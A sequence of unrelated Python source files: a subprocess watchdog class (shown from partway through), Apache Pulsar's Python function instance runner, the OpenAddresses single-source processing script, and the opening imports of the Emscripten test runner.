#os.environ['COMSPEC'] = '%SystemRoot%\system32\cmd.exe'
def nope(*args, **kwargs):
pass
class WatchDog(threading.Thread):
TICK_SECONDS = .1
START_SECONDS_DEFAULT = 2
def __init__(self, suproc_command, stdin_queue, stdout_queue, parent, base_dir=None, os_env=None):
threading.Thread.__init__(self)
self.setDaemon(False)  # we want it to survive the parent's death so it can detect inactivity and terminate the subprocess
self.setName('esstool-watchdog-thd')
self._subproc_command = suproc_command
self._os_env = os_env
self._birthtime = None
self._stopped = False
self._start_failed = False
self._pipe = None
self._stdout_queue = stdout_queue
self._stdin_queue = stdin_queue
self._parent = parent
self._autorestart = True
self._exec_mode_shell = False
self._exec_mode_shell_execution_completed = False
if sys.platform == 'win32':
self._startupinfo = subprocess.STARTUPINFO()
self._startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
self._startupinfo.wShowWindow = subprocess.SW_HIDE
self.log = logging.getLogger(self.name)
self.log.handlers = []
self.log.addHandler(logging.NullHandler())
# self.log.propagate = False
self.log.setLevel(logging.INFO)
self.log.debug = nope
self._base_dir = None
try:
if base_dir:
os.chdir(base_dir)
self._base_dir = base_dir
#os.environ["PATH"] += ";"+base_dir
#os.environ["PATH"] += ";"+"C:\Ovation\shc\config"
except Exception as e:
self.log.error("could not change base directory to: %s" % base_dir)
@property
def is_suprocess_started(self):
if self._pipe is None:
return False
if self._pipe.poll() is not None:
return False
return True
@property
def autorestart(self):
return self._autorestart
@property
def shell_execution_completed(self):
if self._exec_mode_shell:
if self._exec_mode_shell_execution_completed:
return True
return False
self.log.error("swatchdog not set for single shell execution")
return False
def enable_autorestart(self):
self._autorestart = True
def disable_autorestart(self):
self._autorestart = False
def set_single_shell_cmd_execution_mode(self):
self.disable_autorestart()
self._exec_mode_shell = True
self._exec_mode_shell_execution_completed = False
self.START_SECONDS_DEFAULT = 0.0001
def start_subproc(self):
close_fds = False if sys.platform == 'win32' else True
if sys.platform == 'win32':
if self._os_env is None:
os_env = os.environ
else:
os_env = self._os_env
#self.log.log(1000, "cmd to open in subproc: %s" % self._subproc_command)
#self.log.log(1000, "cwd: %s" % os.getcwd())
#self.log.log(1000, "env: %s" % os_env)
self._pipe = subprocess.Popen(self._subproc_command.strip(), shell=self._exec_mode_shell, close_fds=close_fds,
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
bufsize=0, startupinfo=self._startupinfo, env=os_env)
#self.log.log(1000, "pipe: %s" % self._pipe)
#self.log.log(1000, "pipe.poll(): %s" % self._pipe.poll())
#self.log.log(1000, "is_process_started: %s" % self.is_suprocess_started)
elif sys.platform.startswith('linux'):
self._pipe = subprocess.Popen(self._subproc_command, shell=self._exec_mode_shell, close_fds=close_fds,
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
bufsize=0, env=os.environ, preexec_fn=os.setpgrp)
self._birthtime = time.time()
def poll_on_subproc(self):
close_fds = False if sys.platform == 'win32' else True
try:
while True:
try:
if self._stopped:
self.log.debug("poll on subproc: killing within thread run")
try:
if self._pipe is not None:
self._pipe.terminate()
except WindowsError:
self.log.error("could not kill subprocess; make sure it doesn't remain")
self._pipe = None
return True
else:
if self._pipe.poll() is not None:
if time.time() - self._birthtime < self.START_SECONDS_DEFAULT:
self.log.error('WatchDog(%r) start failed', self.getName())
self._stopped = True
self._pipe = None
self._start_failed = True
return False
elif not self._stopped:
if self._autorestart:
self.log.error('WatchDog(%r) is dead, restarting', self.getName())
self.stop()
if not self.start(blocking=True):
self.log.error("restart failed")
else:
self.log.info("command execution completed")
self._exec_mode_shell_execution_completed = True
self.stop(skip_confirmation=True)
time.sleep(self.TICK_SECONDS)
except Exception as e:
self.log.exception('WatchDog.run error: %r', e)
finally:
try:
self._pipe.terminate()
except (AttributeError, OSError):
pass
def start(self, blocking=False, blocking_timeout_sec=5):
self.log.info("start called")
self._stopped = False
try:
self.start_subproc()
except Exception as e:
self.log.exception("could not start subprocess: %s" % e.message)
raise Exception("initialization failure for cmd: %s in base path: %s" % (self._subproc_command.strip(), self._base_dir))
run_thd = threading.Thread(target=self.poll_on_subproc)
run_thd.daemon = True
run_thd.start()
try:
stdout_thd = threading.Thread(target=self.attach_queue_to_stdout)
stdout_thd.daemon = True
stdout_thd.start()
except AttributeError:
self.stop()
return False
try:
stdin_thd = threading.Thread(target=self.attach_queue_to_stdin)
stdin_thd.daemon = True
stdin_thd.start()
except AttributeError:
self.stop()
return False
# stdout_process_thd = threading.Thread(target=self.process_stdout_output)
# stdout_process_thd.daemon = True
# stdout_process_thd.start()
self.log.log(1000, "is subprocess started: %s" % self.is_suprocess_started)
if blocking:
start_ts = time.time()
while not self.is_suprocess_started:
time.sleep(0.01)
if time.time() - start_ts > blocking_timeout_sec:
self.log.info("not started within confirmation timeout")
return False
return True
def stop(self, skip_confirmation=False):
self.log.info("stop called")
try:
# self.log.info("PID to kill: %s" % self._pipe.pid)
self._stopped = True
if skip_confirmation:
self.log.debug("no confirmation needed, returning")
self._pipe.terminate()
return True
timeout = self.START_SECONDS_DEFAULT
while timeout > 0:
if not self.is_suprocess_started:
self.log.info("confirmed quit within quit timeout")
time.sleep(0.3) #FIXME temporary fix to avoid exceptions due to threads not finished in time
return True
else:
time.sleep(self.TICK_SECONDS)
timeout -= self.TICK_SECONDS
self.log.info("quiting not confirmed within timeout")
return False
except AttributeError:
self.log.exception("could not stop thd")
return False
def attach_queue_to_stdout(self):
start_ts = time.time()
while time.time() - start_ts < self.START_SECONDS_DEFAULT:
if self.is_suprocess_started:
hJob = win32job.CreateJobObject(None, "")
extended_info = win32job.QueryInformationJobObject(hJob, win32job.JobObjectExtendedLimitInformation)
extended_info['BasicLimitInformation']['LimitFlags'] = win32job.JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE
win32job.SetInformationJobObject(hJob, win32job.JobObjectExtendedLimitInformation, extended_info)
perms = win32con.PROCESS_TERMINATE | win32con.PROCESS_SET_QUOTA
hProcess = win32api.OpenProcess(perms, False, self._pipe.pid)
win32job.AssignProcessToJobObject(hJob, hProcess)
self.log.debug("attaching queue to stdout")
while True:
try:
if self._stopped:
break
if self._start_failed:
break
gc.disable()
nextline = self._pipe.stdout.readline()
if nextline == '': # and self._pipe.poll() is not None:
time.sleep(0.05)
continue
self.log.debug("got from stdout: %s" % nextline.strip())
try:
self._stdout_queue.put(nextline.strip())
except Exception as e:
self.log.exception("could not put result to stdout queue, reason: %s" % e.message)
gc.enable()
except AttributeError:
self.log.exception("stdout queue broken")
break
finally:
gc.enable()
#if self._pipe:
# self._pipe.stdout.close()
else:
if not self._stopped:
self.log.warning("pipe is None; can't attach queue to stdout")
time.sleep(0.2)
def attach_queue_to_stdin(self):
start_ts = time.time()
while time.time() - start_ts < self.START_SECONDS_DEFAULT:
try:
if self.is_suprocess_started:
self.log.debug("attaching queue to stdin")
while True:
try:
if self._stopped:
break
if self._start_failed:
break
gc.disable()
input_cmd = self._stdin_queue.get(timeout=.1)
if input_cmd == '': # and self._pipe.poll() is not None:
continue
self.log.debug("writing to stdin: %s" % input_cmd)
self._pipe.stdin.write(input_cmd + '\n')
self._pipe.stdin.flush()
continue
except Empty:
continue
except (IOError, AttributeError):
break
finally:
gc.enable()
#if self._pipe:
# self._pipe.stdin.close()
else:
if not self._stopped:
self.log.warning("pipe is None; can't attach queue to stdin")
time.sleep(0.2)
except KeyboardInterrupt:
pass
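# A minimal usage sketch of WatchDog (hedged: 'ping 127.0.0.1' is only a
# placeholder command, and the parent argument is not used by the methods
# shown here, so None is passed):
#
#     stdin_q, stdout_q = Queue(), Queue()
#     dog = WatchDog('ping 127.0.0.1', stdin_q, stdout_q, parent=None)
#     if dog.start(blocking=True):
#         stdin_q.put('some command')     # forwarded to the subprocess stdin
#         print(stdout_q.get(timeout=5))  # one line read from its stdout
#         dog.stop()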
|
python_instance.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -*- encoding: utf-8 -*-
"""python_instance.py: Python Instance for running python functions
"""
import base64
import os
import signal
import time
import Queue
import threading
from functools import partial
from collections import namedtuple
from threading import Timer
import traceback
import sys
import pulsar
import contextimpl
import Function_pb2
import log
import util
import InstanceCommunication_pb2
Log = log.Log
# Equivalent of the InstanceConfig in Java
InstanceConfig = namedtuple('InstanceConfig', 'instance_id function_id function_version function_details max_buffered_tuples')
# This is the message that the consumers put on the queue for the function thread to process
InternalMessage = namedtuple('InternalMessage', 'message topic serde consumer')
InternalQuitMessage = namedtuple('InternalQuitMessage', 'quit')
DEFAULT_SERIALIZER = "serde.IdentitySerDe"
# We keep track of the following metrics
class Stats(object):
def __init__(self):
self.reset()
def reset(self):
self.nprocessed = 0
self.nsuccessfullyprocessed = 0
self.nuserexceptions = 0
self.latestuserexceptions = []
self.nsystemexceptions = 0
self.latestsystemexceptions = []
self.ndeserialization_exceptions = {}
self.nserialization_exceptions = 0
self.latency = 0
self.lastinvocationtime = 0
def increment_deser_errors(self, topic):
if topic not in self.ndeserialization_exceptions:
self.ndeserialization_exceptions[topic] = 0
self.ndeserialization_exceptions[topic] += 1
def increment_successfully_processed(self, latency):
self.nsuccessfullyprocessed += 1
self.latency += latency
def increment_processed(self, processed_at):
self.nprocessed += 1
self.lastinvocationtime = processed_at
def record_user_exception(self, ex):
self.latestuserexceptions.append((traceback.format_exc(), int(time.time() * 1000)))
if len(self.latestuserexceptions) > 10:
self.latestuserexceptions.pop(0)
self.nuserexceptions = self.nuserexceptions + 1
def record_system_exception(self, ex):
self.latestsystemexceptions.append((traceback.format_exc(), int(time.time() * 1000)))
if len(self.latestsystemexceptions) > 10:
self.latestsystemexceptions.pop(0)
self.nsystemexceptions = self.nsystemexceptions + 1
def compute_latency(self):
if self.nsuccessfullyprocessed <= 0:
return 0
else:
return self.latency / self.nsuccessfullyprocessed
def update(self, object):
self.nprocessed = object.nprocessed
self.nsuccessfullyprocessed = object.nsuccessfullyprocessed
self.nuserexceptions = object.nuserexceptions
self.nsystemexceptions = object.nsystemexceptions
self.nserialization_exceptions = object.nserialization_exceptions
self.latency = object.latency
self.lastinvocationtime = object.lastinvocationtime
self.latestuserexceptions = []
self.latestsystemexceptions = []
self.ndeserialization_exceptions.clear()
self.latestuserexceptions.append(object.latestuserexceptions)
self.latestsystemexceptions.append(object.latestsystemexceptions)
self.ndeserialization_exceptions.update(object.ndeserialization_exceptions)
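# Worked example for Stats.compute_latency(): after three successful calls
# taking 10 ms, 20 ms and 30 ms, latency == 60 and nsuccessfullyprocessed == 3,
# so compute_latency() returns 20 (ms); with zero successes it returns 0.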
class PythonInstance(object):
def __init__(self, instance_id, function_id, function_version, function_details, max_buffered_tuples, user_code, log_topic, pulsar_client):
self.instance_config = InstanceConfig(instance_id, function_id, function_version, function_details, max_buffered_tuples)
self.user_code = user_code
self.queue = Queue.Queue(max_buffered_tuples)
self.log_topic_handler = None
if log_topic is not None:
self.log_topic_handler = log.LogTopicHandler(str(log_topic), pulsar_client)
self.pulsar_client = pulsar_client
self.input_serdes = {}
self.consumers = {}
self.output_serde = None
self.function_class = None
self.function_purefunction = None
self.producer = None
self.execution_thread = None
self.atmost_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATMOST_ONCE')
self.atleast_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATLEAST_ONCE')
self.auto_ack = self.instance_config.function_details.autoAck
self.contextimpl = None
self.total_stats = Stats()
self.current_stats = Stats()
self.stats = Stats()
self.last_health_check_ts = time.time()
self.timeout_ms = function_details.source.timeoutMs if function_details.source.timeoutMs > 0 else None
def health_check(self):
self.last_health_check_ts = time.time()
health_check_result = InstanceCommunication_pb2.HealthCheckResult()
health_check_result.success = True
return health_check_result
def process_spawner_health_check_timer(self):
if time.time() - self.last_health_check_ts > 90:
Log.critical("Haven't received health check from spawner in a while. Stopping instance...")
os.kill(os.getpid(), signal.SIGTERM)
sys.exit(1)
Timer(30, self.process_spawner_health_check_timer).start()
def run(self):
# Setup consumers and input deserializers
mode = pulsar._pulsar.ConsumerType.Shared
if self.instance_config.function_details.source.subscriptionType == Function_pb2.SubscriptionType.Value("FAILOVER"):
mode = pulsar._pulsar.ConsumerType.Failover
subscription_name = str(self.instance_config.function_details.tenant) + "/" + \
str(self.instance_config.function_details.namespace) + "/" + \
str(self.instance_config.function_details.name)
for topic, serde in self.instance_config.function_details.source.topicsToSerDeClassName.items():
if not serde:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), serde)
self.input_serdes[topic] = serde_kclass()
Log.info("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, topic, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
function_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.className)
if function_kclass is None:
Log.critical("Could not import User Function Module %s" % self.instance_config.function_details.className)
raise NameError("Could not import User Function Module %s" % self.instance_config.function_details.className)
try:
self.function_class = function_kclass()
except:
self.function_purefunction = function_kclass
self.contextimpl = contextimpl.ContextImpl(self.instance_config, Log, self.pulsar_client, self.user_code, self.consumers)
# Now launch a thread that does execution
self.execution_thread = threading.Thread(target=self.actual_execution)
self.execution_thread.start()
# start proccess spawner health check timer
self.last_health_check_ts = time.time()
Timer(30, self.process_spawner_health_check_timer).start()
def actual_execution(self):
Log.info("Started Thread for executing the function")
while True:
msg = self.queue.get(True)
if isinstance(msg, InternalQuitMessage):
break
user_exception = False
system_exception = False
Log.debug("Got a message from topic %s" % msg.topic)
input_object = None
try:
input_object = msg.serde.deserialize(msg.message.data())
except:
self.current_stats.increment_deser_errors(msg.topic)
self.total_stats.increment_deser_errors(msg.topic)
continue
self.contextimpl.set_current_message_context(msg.message.message_id(), msg.topic)
output_object = None
self.saved_log_handler = None
if self.log_topic_handler is not None:
self.saved_log_handler = log.remove_all_handlers()
log.add_handler(self.log_topic_handler)
start_time = time.time()
self.current_stats.increment_processed(int(start_time) * 1000)
self.total_stats.increment_processed(int(start_time) * 1000)
successfully_executed = False
try:
if self.function_class is not None:
output_object = self.function_class.process(input_object, self.contextimpl)
else:
output_object = self.function_purefunction.process(input_object)
successfully_executed = True
except Exception as e:
Log.exception("Exception while executing user method")
self.total_stats.record_user_exception(e)
self.current_stats.record_user_exception(e)
end_time = time.time()
latency = (end_time - start_time) * 1000
self.total_stats.increment_successfully_processed(latency)
self.current_stats.increment_successfully_processed(latency)
if self.log_topic_handler is not None:
log.remove_all_handlers()
log.add_handler(self.saved_log_handler)
if successfully_executed:
self.process_result(output_object, msg)
def done_producing(self, consumer, orig_message, result, sent_message):
if result == pulsar.Result.Ok and self.auto_ack and self.atleast_once:
consumer.acknowledge(orig_message)
def process_result(self, output, msg):
if output is not None:
output_bytes = None
if self.output_serde is None:
self.setup_output_serde()
if self.producer is None:
self.setup_producer()
try:
output_bytes = bytes(self.output_serde.serialize(output))
except:
self.current_stats.nserialization_exceptions += 1
self.total_stats.nserialization_exceptions += 1
if output_bytes is not None:
props = {"__pfn_input_topic__" : str(msg.topic), "__pfn_input_msg_id__" : base64.b64encode(msg.message.message_id().serialize())}
try:
self.producer.send_async(output_bytes, partial(self.done_producing, msg.consumer, msg.message), properties=props)
except Exception as e:
self.current_stats.record_system_exception(e)
self.total_stats.record_system_exception(e)
elif self.auto_ack and self.atleast_once:
msg.consumer.acknowledge(msg.message)
def setup_output_serde(self):
if self.instance_config.function_details.sink.serDeClassName is not None and \
len(self.instance_config.function_details.sink.serDeClassName) > 0:
serde_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.sink.serDeClassName)
self.output_serde = serde_kclass()
else:
global DEFAULT_SERIALIZER
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
self.output_serde = serde_kclass()
def setup_producer(self):
if self.instance_config.function_details.sink.topic is not None and \
len(self.instance_config.function_details.sink.topic) > 0:
Log.info("Setting up producer for topic %s" % self.instance_config.function_details.sink.topic)
self.producer = self.pulsar_client.create_producer(
str(self.instance_config.function_details.sink.topic),
block_if_queue_full=True,
batching_enabled=True,
batching_max_publish_delay_ms=1,
max_pending_messages=100000)
def message_listener(self, topic, serde, consumer, message):
item = InternalMessage(message, topic, serde, consumer)
self.queue.put(item, True)
if self.atmost_once and self.auto_ack:
consumer.acknowledge(message)
def get_and_reset_metrics(self):
# First get any user metrics
metrics = self.get_metrics()
self.reset_metrics()
return metrics
def reset_metrics(self):
self.stats.update(self.current_stats)
self.current_stats.reset()
self.contextimpl.reset_metrics()
def get_metrics(self):
# First get any user metrics
metrics = self.contextimpl.get_metrics()
# Now add system metrics as well
self.add_system_metrics("__total_processed__", self.stats.nprocessed, metrics)
self.add_system_metrics("__total_successfully_processed__", self.stats.nsuccessfullyprocessed, metrics)
self.add_system_metrics("__total_system_exceptions__", self.stats.nsystemexceptions, metrics)
self.add_system_metrics("__total_user_exceptions__", self.stats.nuserexceptions, metrics)
for (topic, metric) in self.stats.ndeserialization_exceptions.items():
self.add_system_metrics("__total_deserialization_exceptions__" + topic, metric, metrics)
self.add_system_metrics("__total_serialization_exceptions__", self.stats.nserialization_exceptions, metrics)
self.add_system_metrics("__avg_latency_ms__", self.stats.compute_latency(), metrics)
return metrics
def add_system_metrics(self, metric_name, value, metrics):
metrics.metrics[metric_name].count = value
metrics.metrics[metric_name].sum = value
metrics.metrics[metric_name].min = 0
metrics.metrics[metric_name].max = value
def get_function_status(self):
status = InstanceCommunication_pb2.FunctionStatus()
status.running = True
status.numProcessed = self.total_stats.nprocessed
status.numSuccessfullyProcessed = self.total_stats.nsuccessfullyprocessed
status.numUserExceptions = self.total_stats.nuserexceptions
status.instanceId = self.instance_config.instance_id
for ex, tm in self.total_stats.latestuserexceptions:
to_add = status.latestUserExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
status.numSystemExceptions = self.total_stats.nsystemexceptions
for ex, tm in self.total_stats.latestsystemexceptions:
to_add = status.latestSystemExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
for (topic, metric) in self.total_stats.ndeserialization_exceptions.items():
status.deserializationExceptions[topic] = metric
status.serializationExceptions = self.total_stats.nserialization_exceptions
status.averageLatency = self.total_stats.compute_latency()
status.lastInvocationTime = self.total_stats.lastinvocationtime
return status
def join(self):
self.queue.put(InternalQuitMessage(True), True)
self.execution_thread.join()
|
process_one.py
|
from __future__ import absolute_import, division, print_function
import logging; _L = logging.getLogger('openaddr.process_one')
from urllib.parse import urlparse
from os.path import join, basename, dirname, exists, splitext, relpath
from shutil import copy, move, rmtree
from argparse import ArgumentParser
from os import mkdir, rmdir, close, chmod
from _thread import get_ident
import tempfile, json, csv, sys, enum
import threading
from . import util, cache, conform, preview, slippymap, CacheResult, ConformResult, __version__
from .cache import DownloadError
from .conform import check_source_tests
from esridump.errors import EsriDownloadError
class SourceSaysSkip(RuntimeError): pass
class SourceTestsFailed(RuntimeError): pass
@enum.unique
class SourceProblem (enum.Enum):
''' Possible problems encountered in a source.
'''
skip_source = 'Source says to skip'
missing_conform = 'Source is missing a conform object'
unknown_conform_type = 'Unknown source conform type'
download_source_failed = 'Could not download source data'
conform_source_failed = 'Could not conform source data'
no_coverage = 'Missing or incomplete coverage'
no_esri_token = 'Missing required ESRI token'
test_failed = 'An acceptance test failed'
no_addresses_found = 'Found no addresses in source data'
def boolstr(value):
'''
'''
if value is True:
return 'true'
if value is False:
return 'false'
if value is None:
return ''
raise ValueError(repr(value))
def process(source, destination, do_preview, mapzen_key=None, extras=dict()):
''' Process a single source and destination, return path to JSON state file.
Creates a new directory and files under destination.
'''
# The main processing thread holds wait_lock until it is done.
# The logging thread periodically writes data in the background,
# then exits once the main thread releases the lock.
wait_lock = threading.Lock()
proc_wait = threading.Thread(target=util.log_process_usage, args=(wait_lock, ))
temp_dir = tempfile.mkdtemp(prefix='process_one-', dir=destination)
temp_src = join(temp_dir, basename(source))
copy(source, temp_src)
log_handler = get_log_handler(temp_dir)
logging.getLogger('openaddr').addHandler(log_handler)
with wait_lock:
proc_wait.start()
cache_result, conform_result = CacheResult.empty(), ConformResult.empty()
preview_path, slippymap_path, skipped_source = None, None, False
tests_passed = None
try:
with open(temp_src) as file:
if json.load(file).get('skip', None):
raise SourceSaysSkip()
# Check tests in source data.
with open(temp_src) as file:
tests_passed, failure_details = check_source_tests(json.load(file))
if tests_passed is False:
raise SourceTestsFailed(failure_details)
# Cache source data.
try:
cache_result = cache(temp_src, temp_dir, extras)
except EsriDownloadError as e:
_L.warning('Could not download ESRI source data: {}'.format(e))
raise
except DownloadError as e:
_L.warning('Could not download source data')
raise
if not cache_result.cache:
_L.warning('Nothing cached')
else:
_L.info(u'Cached data in {}'.format(cache_result.cache))
# Conform cached source data.
conform_result = conform(temp_src, temp_dir, cache_result.todict())
if not conform_result.path:
_L.warning('Nothing processed')
else:
_L.info('Processed data in {}'.format(conform_result.path))
if do_preview and mapzen_key:
preview_path = render_preview(conform_result.path, temp_dir, mapzen_key)
if do_preview:
slippymap_path = render_slippymap(conform_result.path, temp_dir)
if not preview_path:
_L.warning('Nothing previewed')
else:
_L.info('Preview image in {}'.format(preview_path))
except SourceSaysSkip:
_L.info('Source says to skip in process_one.process()')
skipped_source = True
except SourceTestsFailed as e:
_L.warning('A source test failed in process_one.process(): %s', str(e))
tests_passed = False
except Exception:
_L.warning('Error in process_one.process()', exc_info=True)
finally:
# Make sure this gets done no matter what
logging.getLogger('openaddr').removeHandler(log_handler)
# Write output
state_path = write_state(source, skipped_source, destination, log_handler,
tests_passed, cache_result, conform_result, preview_path, slippymap_path,
temp_dir)
log_handler.close()
rmtree(temp_dir)
return state_path
def render_preview(csv_filename, temp_dir, mapzen_key):
'''
'''
png_filename = join(temp_dir, 'preview.png')
preview.render(csv_filename, png_filename, 668, 2, mapzen_key)
return png_filename
def render_slippymap(csv_filename, temp_dir):
'''
'''
try:
mbtiles_filename = join(temp_dir, 'slippymap.mbtiles')
slippymap.generate(mbtiles_filename, csv_filename)
except Exception as e:
_L.error('%s in render_slippymap: %s', type(e), e)
return None
else:
return mbtiles_filename
class LogFilterCurrentThread:
''' Logging filter object to match only records from the current thread.
'''
def __init__(self):
# Seems to work as unique ID with multiprocessing.Process() as well as threading.Thread()
self.thread_id = get_ident()
def filter(self, record):
return record.thread == self.thread_id
def get_log_handler(directory):
''' Create a new file handler and return it.
'''
handle, filename = tempfile.mkstemp(dir=directory, suffix='.log')
close(handle)
chmod(filename, 0o644)
handler = logging.FileHandler(filename)
handler.setFormatter(logging.Formatter(u'%(asctime)s %(levelname)08s: %(message)s'))
handler.setLevel(logging.DEBUG)
# # Limit log messages to the current thread
# handler.addFilter(LogFilterCurrentThread())
return handler
def find_source_problem(log_contents, source):
'''
'''
if 'WARNING: A source test failed' in log_contents:
return SourceProblem.test_failed
if 'WARNING: Source is missing a conform object' in log_contents:
return SourceProblem.missing_conform
if 'WARNING: Unknown source conform type' in log_contents:
return SourceProblem.unknown_conform_type
if 'WARNING: Found no addresses in source data' in log_contents:
return SourceProblem.no_addresses_found
if 'WARNING: Could not download source data' in log_contents:
return SourceProblem.download_source_failed
if 'WARNING: Error doing conform; skipping' in log_contents:
return SourceProblem.conform_source_failed
if 'WARNING: Could not download ESRI source data: Could not retrieve layer metadata: Token Required' in log_contents:
return SourceProblem.no_esri_token
if 'coverage' in source:
coverage = source.get('coverage')
if 'US Census' in coverage or 'ISO 3166' in coverage or 'geometry' in coverage:
pass
else:
return SourceProblem.no_coverage
else:
return SourceProblem.no_coverage
return None
def write_state(source, skipped, destination, log_handler, tests_passed,
cache_result, conform_result, preview_path, slippymap_path,
temp_dir):
'''
'''
source_id, _ = splitext(basename(source))
statedir = join(destination, source_id)
if not exists(statedir):
mkdir(statedir)
if cache_result.cache:
scheme, _, cache_path1, _, _, _ = urlparse(cache_result.cache)
if scheme in ('file', ''):
cache_path2 = join(statedir, 'cache{1}'.format(*splitext(cache_path1)))
copy(cache_path1, cache_path2)
state_cache = relpath(cache_path2, statedir)
else:
state_cache = cache_result.cache
else:
state_cache = None
if conform_result.path:
_, _, processed_path1, _, _, _ = urlparse(conform_result.path)
processed_path2 = join(statedir, 'out{1}'.format(*splitext(processed_path1)))
copy(processed_path1, processed_path2)
# Write the sample data to a sample.json file
if conform_result.sample:
sample_path = join(statedir, 'sample.json')
with open(sample_path, 'w') as sample_file:
json.dump(conform_result.sample, sample_file, indent=2)
if preview_path:
preview_path2 = join(statedir, 'preview.png')
copy(preview_path, preview_path2)
if slippymap_path:
slippymap_path2 = join(statedir, 'slippymap.mbtiles')
copy(slippymap_path, slippymap_path2)
log_handler.flush()
output_path = join(statedir, 'output.txt')
copy(log_handler.stream.name, output_path)
if skipped:
source_problem = SourceProblem.skip_source
else:
with open(output_path) as file:
log_content = file.read()
if exists(source):
with open(source) as file:
source_data = json.load(file)
else:
source_data = {}
source_problem = find_source_problem(log_content, source_data)
state = [
('source', basename(source)),
('skipped', bool(skipped)),
('cache', state_cache),
('sample', conform_result.sample and relpath(sample_path, statedir)),
('website', conform_result.website),
('license', conform_result.license),
('geometry type', conform_result.geometry_type),
('address count', conform_result.address_count),
('version', cache_result.version),
('fingerprint', cache_result.fingerprint),
('cache time', cache_result.elapsed and str(cache_result.elapsed)),
('processed', conform_result.path and relpath(processed_path2, statedir)),
('process time', conform_result.elapsed and str(conform_result.elapsed)),
('output', relpath(output_path, statedir)),
('preview', preview_path and relpath(preview_path2, statedir)),
('slippymap', slippymap_path and relpath(slippymap_path2, statedir)),
('attribution required', boolstr(conform_result.attribution_flag)),
('attribution name', conform_result.attribution_name),
('share-alike', boolstr(conform_result.sharealike_flag)),
('source problem', getattr(source_problem, 'value', None)),
('code version', __version__),
('tests passed', tests_passed),
]
with open(join(statedir, 'index.txt'), 'w', encoding='utf8') as file:
out = csv.writer(file, dialect='excel-tab')
for row in zip(*state):
out.writerow(row)
with open(join(statedir, 'index.json'), 'w') as file:
json.dump(list(zip(*state)), file, indent=2)
_L.info(u'Wrote to state: {}'.format(file.name))
return file.name
parser = ArgumentParser(description='Run one source file locally, prints output path.')
parser.add_argument('source', help='Required source file name.')
parser.add_argument('destination', help='Required output directory name.')
parser.add_argument('--render-preview', help='Render a map preview',
action='store_const', dest='render_preview',
const=True, default=False)
parser.add_argument('--skip-preview', help="Don't render a map preview",
action='store_const', dest='render_preview',
const=False, default=False)
parser.add_argument('--mapzen-key', dest='mapzen_key',
help='Mapzen API Key. See: https://mapzen.com/documentation/overview/')
parser.add_argument('-l', '--logfile', help='Optional log file name.')
parser.add_argument('-v', '--verbose', help='Turn on verbose logging',
action='store_const', dest='loglevel',
const=logging.DEBUG, default=logging.INFO)
parser.add_argument('-q', '--quiet', help='Turn off most logging',
action='store_const', dest='loglevel',
const=logging.WARNING, default=logging.INFO)
def main():
'''
'''
from .jobs import setup_logger
args = parser.parse_args()
setup_logger(logfile=args.logfile, log_level=args.loglevel)
# Allow CSV files with very long fields
csv.field_size_limit(sys.maxsize)
try:
file_path = process(args.source, args.destination, args.render_preview, mapzen_key=args.mapzen_key)
except Exception as e:
_L.error(e, exc_info=True)
return 1
else:
print(file_path)
return 0
if __name__ == '__main__':
exit(main())
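# A minimal command-line sketch based on the ArgumentParser defined above
# (hedged: the source file, output directory and API key are placeholders):
#
#     python -m openaddr.process_one us-ca-berkeley.json ./out \
#         --render-preview --mapzen-key YOUR_MAPZEN_KEY -v
#
# On success the path to the freshly written index.json state file is printed.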
|
runner.py
|
#!/usr/bin/env python3
# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
python tests/runner.py asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
from __future__ import print_function
from subprocess import PIPE, STDOUT
from functools import wraps
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import re
import shlex
import shutil
import string
import subprocess
import sys
import tempfile
import time
import unittest
import webbrowser
if sys.version_info.major == 2:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from urllib import unquote, unquote_plus
else:
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, unquote_plus
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(__rootpath__)
import parallel_runner
from tools.shared import EM_CONFIG, TEMP_DIR, EMCC, EMXX, DEBUG, PYTHON, LLVM_TARGET, ASM_JS_TARGET, EMSCRIPTEN_TEMP_DIR, WASM_TARGET, SPIDERMONKEY_ENGINE, WINDOWS, EM_BUILD_VERBOSE
